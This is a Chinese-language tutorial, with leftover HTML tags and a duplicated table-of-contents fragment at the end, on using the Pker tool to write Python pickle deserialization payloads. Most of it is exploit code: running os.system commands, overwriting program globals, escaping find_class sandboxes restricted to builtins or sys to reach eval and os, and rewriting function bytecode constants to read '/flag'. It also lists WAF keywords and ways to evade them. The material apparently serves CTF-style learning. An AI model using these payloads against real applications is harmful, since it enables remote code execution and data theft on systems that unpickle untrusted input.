Pker工具对Python pickle opcode的利用详解<\/h1>

1. 前言与基本概念<\/h2>

1.1 pickle序列化基础<\/h3>
Python的pickle模块使用操作码(opcode)来定义序列化过程中的指令和格式。操作码是表示序列化操作的指令，以字节形式存储在pickle数据流中，每个操作码对应一个Python对象类型或序列化操作。<\/p>

1.2 Pker工具简介<\/h3>

Pker是一个用于生成pickle操作码(opcode)的工具，主要功能包括：<\/p>

简化操作码编写和调试<\/li>
方便构造pickle二进制流<\/li>

避免手动编写每个操作码<\/li> <\/ul>

2. Pker核心功能与操作码转换<\/h2>

2.1 核心函数<\/h3>

Pker通过三个特殊函数操作Python对象：<\/p>

GLOBAL<\/strong> (对应opcode: b'c'<\/code>)<\/p>

获取module下的全局对象<\/li> 语法: GLOBAL('module', 'instance')<\/code><\/li> 示例: GLOBAL('os', 'system')<\/code><\/li> <\/ul> <\/li> INST<\/strong> (对应opcode: b'i'<\/code>)<\/p> 建立并入栈一个对象(可执行函数)<\/li> 语法: INST('module', 'callable', 'para')<\/code><\/li> 示例: INST('os', 'system', 'ls')<\/code><\/li> <\/ul> <\/li> OBJ<\/strong> (对应opcode: b'o'<\/code>)<\/p> 建立并入栈一个对象(第一个参数为callable)<\/li> 语法: OBJ(callable, para)<\/code><\/li> 示例: OBJ(GLOBAL('os', 'system'), 'ls')<\/code><\/li> <\/ul> <\/li> <\/ol> 2.2 其他重要操作码<\/h3> b'R'<\/code>: 使用参数调用函数(先入栈函数，再入栈参数并调用)<\/li> b's'<\/code>: 更新列表或字典的值(如li[0]=321<\/code>)<\/li> b'b'<\/code>: 对象属性设置(如xx.attr=123<\/code>)<\/li> b'0'<\/code>: 出栈(作为pickle.loads的返回值)<\/li> <\/ul> 3. Pker使用限制<\/h2> 3.1 禁止的操作<\/h3> 不能直接通过索引或属性访问获取值：<\/p> value =<\/span> obj.<\/span>attribute # 不支持<\/span> <\/span><\/span>value =<\/span> my_dict[key] # 不支持<\/span> <\/span><\/span><\/code><\/pre>3.2 允许的操作<\/h3> 使用函数获取值：<\/li> <\/ol> value =<\/span> getattr(obj, 'attribute'<\/span>) <\/span><\/span>value =<\/span> my_dict.<\/span>get(key) <\/span><\/span><\/code><\/pre> 赋值操作不受限制：<\/li> <\/ol> setattr(obj, 'attribute'<\/span>, new_value) <\/span><\/span>my_dict[key] =<\/span> new_value <\/span><\/span><\/code><\/pre>4. Pker实战应用<\/h2> 4.1 命令执行方法<\/h3> 4.1.1 b'R'<\/code>调用机制<\/h4> s =<\/span> 'whoami'<\/span> <\/span><\/span>system =<\/span> GLOBAL('os'<\/span>, 'system'<\/span>) <\/span><\/span>system(s) # b'R'调用<\/span> <\/span><\/span>return<\/span> <\/span><\/span><\/code><\/pre>4.1.2 b'i'<\/code>调用机制<\/h4> INST('os'<\/span>, 'system'<\/span>, 'whoami'<\/span>) <\/span><\/span><\/code><\/pre>4.1.3 b'c'<\/code>和b'o'<\/code>调用机制<\/h4> OBJ(GLOBAL('os'<\/span>, 'system'<\/span>), 'whoami'<\/span>) <\/span><\/span><\/code><\/pre>4.1.4 多参数调用<\/h4> INST('[module]'<\/span>, '[callable]'<\/span>, par0, par1...<\/span>) <\/span><\/span>OBJ(GLOBAL('[module]'<\/span>, '[callable]'<\/span>), par0, par1...<\/span>) <\/span><\/span><\/code><\/pre>4.2 实例化对象<\/h3> 4.2.1 直接实例化<\/h4> animal =<\/span> INST('__main__'<\/span>, 'Animal'<\/span>, '1'<\/span>, '2'<\/span>) <\/span><\/span>return<\/span> animal <\/span><\/span><\/code><\/pre>或<\/p> animal =<\/span> OBJ(GLOBAL('__main__'<\/span>, 'Animal'<\/span>), '1'<\/span>, '2'<\/span>) <\/span><\/span>return<\/span> animal <\/span><\/span><\/code><\/pre>4.2.2 先实例化后赋值<\/h4> animal =<\/span> INST('__main__'<\/span>, 'Animal'<\/span>) <\/span><\/span>animal.<\/span>name =<\/span> '1'<\/span> <\/span><\/span>animal.<\/span>category =<\/span> '2'<\/span> <\/span><\/span>return<\/span> animal <\/span><\/span><\/code><\/pre>4.3 全局变量覆盖<\/h3> 4.3.1 覆盖执行文件变量<\/h4> secret =<\/span> GLOBAL('__main__'<\/span>, 'secret'<\/span>) <\/span><\/span>secret.<\/span>name =<\/span> '1'<\/span> <\/span><\/span>secret.<\/span>category =<\/span> '2'<\/span> <\/span><\/span><\/code><\/pre>4.3.2 覆盖模块变量<\/h4> game =<\/span> GLOBAL('guess_game'<\/span>, 'game'<\/span>) <\/span><\/span>game.<\/span>curr_ticket =<\/span> '123'<\/span> <\/span><\/span><\/code><\/pre>5. 绕过限制的技巧<\/h2> 5.1 绕过builtins限制<\/h3> 当find_class<\/code>限制只允许安全builtins时：<\/p> getattr =<\/span> GLOBAL('builtins'<\/span>, 'getattr'<\/span>) <\/span><\/span>dict =<\/span> GLOBAL('builtins'<\/span>, 'dict'<\/span>) <\/span><\/span>dict_get =<\/span> getattr(dict, 'get'<\/span>) <\/span><\/span>glo_dic =<\/span> GLOBAL('builtins'<\/span>, 'globals'<\/span>)() <\/span><\/span>builtins =<\/span> dict_get(glo_dic, 'builtins'<\/span>) <\/span><\/span>eval =<\/span> getattr(builtins, 'eval'<\/span>) <\/span><\/span>eval('print("123")'<\/span>) <\/span><\/span>return<\/span> <\/span><\/span><\/code><\/pre>5.2 绕过sys模块限制<\/h3> 当只允许sys模块且禁止子模块时：<\/p> modules =<\/span> GLOBAL('sys'<\/span>, 'modules'<\/span>) <\/span><\/span>modules['sys'<\/span>] =<\/span> modules <\/span><\/span>modules_get =<\/span> GLOBAL('sys'<\/span>, 'get'<\/span>) <\/span><\/span>os =<\/span> modules_get('os'<\/span>) <\/span><\/span>modules['sys'<\/span>] =<\/span> os <\/span><\/span>system =<\/span> GLOBAL('sys'<\/span>, 'system'<\/span>) <\/span><\/span>system('whoami'<\/span>) <\/span><\/span>return<\/span> <\/span><\/span><\/code><\/pre>6. 高级利用技巧：修改字节码<\/h2> 6.1 修改函数字节码常量<\/h3> 通过修改co_consts<\/code>改变函数行为：<\/p> getattr =<\/span> GLOBAL('builtins'<\/span>, 'getattr'<\/span>) <\/span><\/span>src =<\/span> GLOBAL('__main__'<\/span>, 'src'<\/span>) <\/span><\/span>setattr =<\/span> GLOBAL('builtins'<\/span>, 'setattr'<\/span>) <\/span><\/span>codetype =<\/span> GLOBAL('types'<\/span>, 'CodeType'<\/span>) <\/span><\/span> <\/span><\/span>g2 =<\/span> getattr(src, "__code__"<\/span>) <\/span><\/span>g3 =<\/span> getattr(g2, "co_argcount"<\/span>) <\/span><\/span># 获取其他必要属性...<\/span> <\/span><\/span>g10 =<\/span> (None<\/span>, '\/flag'<\/span>, 'r'<\/span>, 'utf-8'<\/span>, ('encoding'<\/span>,)) <\/span><\/span>g19 =<\/span> codetype(g3, g4, g5, g6, g7, g8, g9, g10, g11, g12, g13, g14, g15, g16, g17, g18) <\/span><\/span>setattr(src, "__code__"<\/span>, g19) <\/span><\/span>return<\/span> <\/span><\/span><\/code><\/pre>6.2 CodeType参数说明<\/h3> types.CodeType<\/code>构造函数参数：<\/p> co_argcount: 参数数量<\/li> co_posonlyargcount: 仅位置参数数量<\/li> co_kwonlyargcount: 仅关键字参数数量<\/li> co_nlocals: 局部变量数量<\/li> co_stacksize: 所需堆栈大小<\/li> co_flags: 标志位<\/li> co_code: 字节码指令<\/li> co_consts: 字节码使用的常量元组(关键修改点)<\/li> co_names: 使用的名称元组<\/li> co_varnames: 局部变量名元组<\/li> co_filename: 文件名<\/li> co_name: 函数名<\/li> co_firstlineno: 第一行行号<\/li> co_lnotab: 行号表<\/li> co_freevars: 自由变量元组<\/li> co_cellvars: 单元变量元组<\/li> <\/ol> 7. 防御与绕过WAF<\/h2> 7.1 常见WAF检测点<\/h3> WAF通常会检测以下关键词：<\/p> {"os"<\/span>, "system"<\/span>, "eval"<\/span>, 'setstate'<\/span>, "globals"<\/span>, 'exec'<\/span>, '__builtins__'<\/span>, <\/span><\/span> 'template'<\/span>, 'render'<\/span>, '<\/span>\\<\/span>'<\/span>, 'compile'<\/span>, 'requests'<\/span>, 'exit'<\/span>, 'pickle'<\/span>, <\/span><\/span> "class"<\/span>, "mro"<\/span>, "flask"<\/span>, "sys"<\/span>, "base"<\/span>, "init"<\/span>, "config"<\/span>, "session"<\/span>} <\/span><\/span><\/code><\/pre>7.2 绕过技巧<\/h3> 使用间接引用(如通过sys.modules获取os)<\/li> 使用字符串拼接<\/li> 利用属性访问而非直接引用<\/li> 修改字节码而非直接调用危险函数<\/li> <\/ol> 8. 总结<\/h2> Pker工具通过抽象pickle操作码，提供了更便捷的方式来构造pickle payload。关键点包括：<\/p> 理解GLOBAL、INST、OBJ三种核心操作<\/li> 掌握操作码与Python代码的对应关系<\/li> 熟悉绕过各种限制的技巧<\/li> 了解高级的字节码修改技术<\/li> 掌握WAF绕过方法<\/li> <\/ol> 通过灵活组合这些技术，可以实现从简单的命令执行到复杂的对象操作等多种攻击场景。<\/p>

Pker工具对Python pickle opcode的利用详解<\/h1>

1. 前言与基本概念<\/h2>

1.1 pickle序列化基础<\/h3> Python的pickle模块使用操作码(opcode)来定义序列化过程中的指令和格式。操作码是表示序列化操作的指令，以字节形式存储在pickle数据流中，每个操作码对应一个Python对象类型或序列化操作。<\/p>

2. Pker核心功能与操作码转换<\/h2>

3. Pker使用限制<\/h2>

4. Pker实战应用<\/h2>

4.1 命令执行方法<\/h3>

4.2 实例化对象<\/h3>

4.3 全局变量覆盖<\/h3>

5. 绕过限制的技巧<\/h2>

6. 高级利用技巧：修改字节码<\/h2>

7. 防御与绕过WAF<\/h2>

1.1 pickle序列化基础<\/h3>
Python的pickle模块使用操作码(opcode)来定义序列化过程中的指令和格式。操作码是表示序列化操作的指令，以字节形式存储在pickle数据流中，每个操作码对应一个Python对象类型或序列化操作。<\/p>